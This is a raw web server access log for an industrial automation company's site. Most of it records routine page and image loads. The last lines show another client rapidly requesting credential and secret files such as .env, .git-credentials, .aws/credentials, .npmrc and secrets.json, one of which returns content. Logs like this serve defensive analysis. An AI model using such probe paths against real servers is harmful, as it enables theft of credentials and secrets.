"/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:04:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:14:08:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:16:45:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 195.178.110.64] [Length 10553] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 195.178.110.64] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 195.178.110.64] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/config" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git-credentials" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/.env.local" [Client 195.178.110.64] [Length 35] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.production" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.npmrc" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets.json" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" 